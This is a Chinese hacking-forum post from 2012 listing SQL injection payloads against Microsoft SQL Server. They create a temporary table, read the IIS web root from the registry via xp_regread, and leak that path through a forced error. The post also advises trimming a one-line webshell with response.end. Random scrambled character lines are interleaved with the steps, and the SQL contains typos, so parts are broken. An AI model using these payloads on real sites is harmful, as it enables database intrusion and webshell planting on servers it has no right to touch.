中国网络渗透测试联盟
标题:
DB权限暴出网站物理路径代码
[打印本页]
作者:
admin
时间:
2012-9-15 14:23
标题:
DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
: \+ M4 Q3 C7 X. d$ ]/ E! l
9 }; i6 j* _. v) [( R1 [3 F" T2 a
q+ [; I7 U8 Z6 O" b+ ? ~+ P1 R1 L
2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
1 M7 Y& @: z6 J2 U2 _0 k6 d
) d! E0 L, t* _1 S) o, ]
. b9 z9 ^$ |2 R1 i: ^2 _
3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
$ @# u. R$ ~* N, V
, U% t( l, S, Q i4 Z
9 g8 s5 h* V/ d( K' P, A) j4 I
4、drop table [jm_tmp]-- 删除此表。
( E1 t: y6 G: Z. i: F+ L" S* G
7 d; e. _' {: w/ }
0 o" {/ R# x# ^/ z& y) O, e1 p
另附上备分专用一句话
/ S- I4 M% r* W2 ~; t
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
3 u& k! f% s' V( v$ `8 d* _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2